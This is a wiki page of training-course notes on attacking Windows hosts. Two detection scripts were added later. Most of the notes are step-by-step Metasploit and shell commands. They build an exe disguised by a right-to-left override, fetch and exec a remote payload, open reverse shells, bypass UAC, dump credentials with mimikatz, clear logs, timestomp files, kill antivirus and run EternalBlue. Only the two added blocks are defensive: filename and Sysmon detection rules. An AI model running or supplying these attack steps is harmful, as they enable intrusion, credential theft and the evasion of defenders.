dardan:cyberacademy:module-9-linux_and_windows_forensics
rdesktop -g 1280x1024 172.16.50.96
03.12.2018 - 3rd week in cyber
OSF forensics - tool for forensics

05.12.2018
I wasn't there

07.12.2018
I wasn't there

10.12.2018
setting up reverse malware via:
regsvr32 /s /n /u /i:http://172.16.65.141:8080/.sct scrobj.dll
task schedule
run persistence (in metasploit)
create malware on the GO platform / language
right to left unicode
jpg to ico #online convert
change file icon with malware icon file created
installing python in windows:
download .exe or .msi
install
setup variables in windows:
in System Properties,
Advanced, Environment Variables
System variables, Path (;C:\Python27)
install pip:
cd C:\Python27\Scripts
pip.exe install pyinstaller | dir | check if pip.exe install pyinstaller is there
setup variables in windows:
in System Properties,
Advanced, Environment Variables
System variables, edit variable value: ;C:\Python27\;C:\Python27\Scripts
cd C:\Users\Lab\Desktop
pyinstaller --onefile mlw.py --icon img.ico
copy right to left symbol from character map
rename mlw.exe to mlwgnp.exe, then paste the character in front of png.exe # it becomes mlwexe.png
C:/python2.7\Tools\scripts> --ico
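The right-to-left override rename above (an .exe that Explorer displays as "mlwexe.png") is easy to catch on the defensive side, because the stored filename still contains the U+202E control character. The following is an added example, not part of the original notes: it takes a list of constructed filenames, reports which Unicode bidi controls they contain, approximates how a file manager would render each name, and compares the displayed extension with the real one.

```python
# Added example (not from the original notes): detect filenames that use Unicode
# bidi override characters (e.g. U+202E, RIGHT-TO-LEFT OVERRIDE) to disguise their
# real extension, the trick the notes use to show "mlwgnp.exe" as "mlwexe.png".
import unicodedata

# Bidi control characters that can reorder how a filename is displayed.
BIDI_CONTROLS = {"\u202a", "\u202b", "\u202c", "\u202d", "\u202e",
                 "\u2066", "\u2067", "\u2068", "\u2069"}

# Constructed sample names: one disguised executable, one benign image,
# one name with a harmless embedding character but no extension mismatch.
SAMPLE_NAMES = [
    "mlw\u202egnp.exe",      # stored name: mlw + RLO + gnp.exe -> shown as mlwexe.png
    "report.png",
    "\u202anotes.txt",
]


def _ext(name: str) -> str:
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def rendered_name(name: str) -> str:
    """Approximate what a file manager shows: text after an RLO is reversed."""
    if "\u202e" not in name:
        return "".join(ch for ch in name if ch not in BIDI_CONTROLS)
    head, _, tail = name.partition("\u202e")
    head = "".join(ch for ch in head if ch not in BIDI_CONTROLS)
    tail = "".join(ch for ch in tail if ch not in BIDI_CONTROLS)
    return head + tail[::-1]


def real_extension(name: str) -> str:
    """Extension the OS actually uses once bidi controls are ignored."""
    return _ext("".join(ch for ch in name if ch not in BIDI_CONTROLS))


def analyze(name: str) -> dict:
    """Describe the stored vs displayed form of one filename."""
    found = [f"U+{ord(ch):04X} {unicodedata.name(ch)}" for ch in name if ch in BIDI_CONTROLS]
    shown = rendered_name(name)
    return {
        "stored": name,
        "displayed": shown,
        "bidi_controls": found,
        "displayed_ext": _ext(shown),
        "actual_ext": real_extension(name),
        # Any bidi control in a filename is worth flagging; the extension
        # mismatch is what turns it into a disguised executable.
        "suspicious": bool(found),
        "extension_mismatch": bool(found) and _ext(shown) != real_extension(name),
    }


def scan_names(names):
    """Return the analysis of every name that carries a bidi control character."""
    return [r for r in (analyze(n) for n in names) if r["suspicious"]]


if __name__ == "__main__":
    for r in scan_names(SAMPLE_NAMES):
        print(f"{r['displayed']!r} is really .{r['actual_ext']} "
              f"(mismatch={r['extension_mismatch']}; {', '.join(r['bidi_controls'])})")
```

The same check can be pointed at a directory listing, a mail gateway's attachment names, or Sysmon FileCreate events; the stored name, not the rendered one, is what the filesystem and the mail server carry, so the control character is always available to inspect.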
msf > use exploit/multi/script/web_delivery
>show targets
> set target 0
> set payload python/meterpreter/reverse_tcp
> set lhost 172.16.65.141
> set uripath /
> exploit
in a new terminal
../ #to execute
gives us a session :)
edit mlw.py
import sys
import urllib2
r=urllib2.urlopen("http://172.16.60.99:8080/")
exec(r.read())
to transfer to windows: python -m SimpleHTTPServer 80
C:>python mlw.py # gives a session
##now compile to exe
c:>pyinstaller --onefile mlw.py
wget http://172.16.60.99:8080
echo "paste content of index.html | base64 -d
copy content of script found
nano mlw2.py / paste script here
python mlw2.py / gives a session
cp to /var/www
copy to windows
pyinstaller --onefile mlw2.py #from location where file is downloaded
cd dist
mlw2.exe #to execute ## error when executing on windows, script problem
fuser -k 80/tcp
msf > use exploit/multi/script/web_delivery
>show targets
> set target 3
> set lhost 172.16.65.141
> set uripath /
> set payload windows/meterpreter/reverse_tcp
> exploit
sessions
sessions -i
getuid
run persistence --help
> use exploit/multi/handler
12.12.2018

## get a session with metasploit via PHP
use multi/script/web_delivery
show targets
set target 1
set lhost xx
set payload php/meterpreter/reverse_tcp
set uripath /
exploit
## generate some output string
in a new terminal execute php -d "script"
the session comes :)
## debug what is happening
** single stage attack
nano info.txt
paste script
wget http://172.16.50.161:8080/
cat index.html
mv index.html index.php
firefox http://127.0.0.1/
the session comes :)
sessions -i
sessions -k 2
==============================
## get a session with metasploit via PSH
set target 2
show options
set payload windows/meterpreter/reverse_tcp
show options
jobs -k
exploit / it generates a link
nano file / paste the link
nano index.html / paste the url
browse 172.16.50.161 / copy the link
in cmd paste the link :) gives you a session
sessions -i x
getuid
> run post/windows/manage/enable_rdp
> run post/windows/manage/ menu options
========================================
## payload_inject
## duplicates an existing session
> use exploit/multi/handler
> set payload windows/meterpreter/reverse_tcp
> set lport xx
> set lhost xx
> exploit -j # silent
meterpreter> background
> run post/windows/manage/payload_inject
> set payload windows/meterpreter/reverse_tcp
> set lport xx
> set lhost xx
> set session x
> exploit :) it duplicates the session
meterpreter> getuid
meterpreter> shell
meterpreter> background
> use exploit/windows/local/bypassuac
> set session 1
> exploit
> set lport xx
> show advanced
> exploit :) gives you a session
meterpreter> getuid
meterpreter> getsystem
meterpreter> getuid
meterpreter> show_mount
meterpreter> ps # process list
## clearing the logs and the importance of logs
meterpreter> clearev # clear logs
## read in memory, read live credentials
meterpreter> kiwi ## explore the tool, similar to mimikatz
meterpreter> lsa_dump_sam
meterpreter> load mimikatz
## importance of file time used and file time modified
meterpreter> timestomp nc.exe ## find files recently accessed, it modified the time used
** siem analysis
** malware analysis
** behavior analysis
## ask injection
> use exploit/windows/local/ask
> set lhost
> set lport
> exploit
meterpreter> getuid
meterpreter> getsystem
> exploit
========================================
## Unicorn.py
python unicorn.py windows/meterpreter/reverse_tcp 172.16.59.161 666 macro
msfconsole -r unicorn.rc
cat powershell_attack.txt
14.12.2018

## malware of the future
## AI
## polymorphic malware, to read during holiday
## autorun script resource
## read from a file in msfconsole
eternalblue
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set rhost IP
set lport port
use exploit/multi/handler
set ExitOnSession false
set PAYLOAD windows/meterpreter/reverse_tcp
set EXITFUNC thread
set LHOST localhost
set LPORT 4445
set AutoRunScript post/windows/manage/killav
exploit -j
msf > use exploit/multi/script/web_delivery
> set TARGET 3
> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST
> show options
> exploit
sessions -c "command"
sessions -c "whoami"
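Three of the techniques in these notes leave well-known traces on the host: the regsvr32 /i:http ... scrobj.dll line (a process-creation event with that command line), timestomp (Sysmon records a changed file creation time as event ID 2, with the previous value), and clearev (Security event 1102 and System event 104 record the log being cleared). The following is an added example, not part of the original notes: a small rule set run over constructed JSON event records whose field names follow Sysmon and Windows Security log conventions; the values, hostnames and IP are made up.

```python
# Added example (not from the original notes): detection rules for three techniques
# the notes use, run over constructed Windows/Sysmon-style event records.
#   - regsvr32 loading a remote scriptlet through scrobj.dll (Sysmon event 1)
#   - file creation time moved backwards, i.e. timestomp (Sysmon event 2)
#   - event log cleared, i.e. clearev (Security 1102 / System 104)
import json
import re

# Constructed sample events (field names modelled on Sysmon/Security logs,
# values invented for this example).
SAMPLE_EVENTS = [
    json.dumps({"channel": "Microsoft-Windows-Sysmon/Operational", "event_id": 1,
                "image": r"C:\Windows\System32\regsvr32.exe",
                "command_line": r"regsvr32 /s /n /u /i:http://10.0.0.5:8080/x.sct scrobj.dll",
                "user": r"LAB\user"}),
    json.dumps({"channel": "Microsoft-Windows-Sysmon/Operational", "event_id": 1,
                "image": r"C:\Windows\System32\regsvr32.exe",
                "command_line": r"regsvr32 /s C:\Program Files\Vendor\lib.dll",  # benign
                "user": r"LAB\user"}),
    json.dumps({"channel": "Microsoft-Windows-Sysmon/Operational", "event_id": 2,
                "image": r"C:\Users\user\Desktop\nc.exe",
                "target_filename": r"C:\Users\user\Desktop\nc.exe",
                "creation_utc_time": "2015-01-01 00:00:00.000",
                "previous_creation_utc_time": "2018-12-12 10:41:03.117"}),
    json.dumps({"channel": "Security", "event_id": 1102, "user": r"LAB\user"}),
    json.dumps({"channel": "System", "event_id": 104, "user": r"LAB\user"}),
]

# regsvr32's /i: argument pointing at a URL is the remote-scriptlet signature.
REGSVR32_REMOTE = re.compile(r"/i:\s*https?://", re.IGNORECASE)


def check_regsvr32(ev):
    if ev.get("event_id") != 1 or not ev.get("image", "").lower().endswith("regsvr32.exe"):
        return None
    cmd = ev.get("command_line", "")
    if REGSVR32_REMOTE.search(cmd) or "scrobj.dll" in cmd.lower():
        return "regsvr32 loading remote scriptlet (scrobj.dll / /i:URL)"
    return None


def check_timestomp(ev):
    if ev.get("event_id") != 2 or "previous_creation_utc_time" not in ev:
        return None
    new, old = ev["creation_utc_time"], ev["previous_creation_utc_time"]
    # Timestamps are zero-padded "YYYY-MM-DD HH:MM:SS.mmm", so string order is time order.
    if new < old:
        return f"file creation time moved backwards ({old} -> {new})"
    return None


def check_log_clear(ev):
    if (ev.get("channel"), ev.get("event_id")) in {("Security", 1102), ("System", 104)}:
        return "event log cleared"
    return None


RULES = [check_regsvr32, check_timestomp, check_log_clear]


def run_rules(lines):
    """Parse each JSON event line and return (event_id, subject, reason) per rule hit."""
    hits = []
    for line in lines:
        ev = json.loads(line)
        for rule in RULES:
            reason = rule(ev)
            if reason:
                hits.append((ev.get("event_id"), ev.get("image") or ev.get("channel"), reason))
    return hits


if __name__ == "__main__":
    for event_id, subject, reason in run_rules(SAMPLE_EVENTS):
        print(f"[{event_id}] {subject}: {reason}")
```

The point of the timestomp rule is the one the notes make about the importance of file times: Sysmon keeps the previous creation time alongside the new one, so a backdated file stands out even after the visible timestamp has been rewritten, and a cleared log is itself an event in the logs that remain.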
dardan/cyberacademy/module-9-linux_and_windows_forensics.txt · Last modified: 2019/02/04 17:32 by dardan
